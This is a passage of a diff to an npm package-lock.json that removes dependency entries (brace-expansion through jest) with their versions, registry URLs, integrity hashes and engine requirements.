"node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": 